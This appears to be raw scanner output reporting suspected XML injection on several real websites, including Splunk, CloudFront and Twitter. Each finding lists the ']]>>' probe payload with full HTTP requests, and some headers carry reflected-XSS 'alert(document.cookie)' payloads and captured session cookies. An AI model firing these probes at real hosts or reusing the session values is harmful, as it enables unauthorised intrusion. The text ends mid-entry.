The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets]]>>/v5/homepage/homepage.hero.js HTTP/1.1 Host: coverall.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942985.2.2.utmcsr=splunkbase.splunk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942985.2; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942985; __kts=1296942984820,http%3A%2F%2Fwww.splunk.com%2F,http%3A%2F%2Fsplunkbase.splunk.com%2F%3F1ffc5%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E46cc332d1dc%3D1; __ktt=e7f-7c3a-23d7-b39612df7d36e75;
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:48:19 GMT Server: lighttpd/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5]]>>/homepage/homepage.hero.js HTTP/1.1 Host: coverall.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942985.2.2.utmcsr=splunkbase.splunk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942985.2; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942985; __kts=1296942984820,http%3A%2F%2Fwww.splunk.com%2F,http%3A%2F%2Fsplunkbase.splunk.com%2F%3F1ffc5%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E46cc332d1dc%3D1; __ktt=e7f-7c3a-23d7-b39612df7d36e75;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Connection: close Date: Sat, 05 Feb 2011 22:48:22 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5/homepage]]>>/homepage.hero.js HTTP/1.1 Host: coverall.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942985.2.2.utmcsr=splunkbase.splunk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942985.2; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942985; __kts=1296942984820,http%3A%2F%2Fwww.splunk.com%2F,http%3A%2F%2Fsplunkbase.splunk.com%2F%3F1ffc5%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E46cc332d1dc%3D1; __ktt=e7f-7c3a-23d7-b39612df7d36e75;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Connection: close Date: Sat, 05 Feb 2011 22:48:24 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5/homepage/homepage.hero.js]]>> HTTP/1.1 Host: coverall.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942985.2.2.utmcsr=splunkbase.splunk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942985.2; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942985; __kts=1296942984820,http%3A%2F%2Fwww.splunk.com%2F,http%3A%2F%2Fsplunkbase.splunk.com%2F%3F1ffc5%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E46cc332d1dc%3D1; __ktt=e7f-7c3a-23d7-b39612df7d36e75;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Connection: close Date: Sat, 05 Feb 2011 22:48:26 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version]]>>/7.01/css/frontpage.css?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01]]>>/css/frontpage.css?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/css]]>>/frontpage.css?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/css/frontpage.css]]>>?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version]]>>/7.01/css/main.css?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01]]>>/css/main.css?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/css]]>>/main.css?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/css/main.css]]>>?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version]]>>/7.01/favicon16.ico HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01]]>>/favicon16.ico HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/favicon16.ico]]>> HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version]]>>/7.01/js/min/frontpage.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01]]>>/js/min/frontpage.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/js]]>>/min/frontpage.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/js/min]]>>/frontpage.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/js/min/frontpage.js]]>>?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version]]>>/7.01/js/min/main.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01]]>>/js/min/main.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/js]]>>/min/main.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/js/min]]>>/main.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/js/min/main.js]]>>?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /load]]>>/ HTTP/1.1 Host: load.exelator.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ...[SNIP]...
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:51:36 GMT Server: HTTP server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /widgets.js]]>> HTTP/1.1 Host: platform.twitter.com Proxy-Connection: keep-alive Referer: http://www.kledy.de/bookmarks.php?18fe2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eef67307aec5=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; __utmv=43838368.lang%3A%20en; k=173.193.214.243.1296843754823170
Response
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sat, 05 Feb 2011 23:33:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /widgets]]>>/tweet_button.html HTTP/1.1 Host: platform.twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sat, 05 Feb 2011 22:58:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /widgets/tweet_button.html]]>> HTTP/1.1 Host: platform.twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sat, 05 Feb 2011 22:58:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
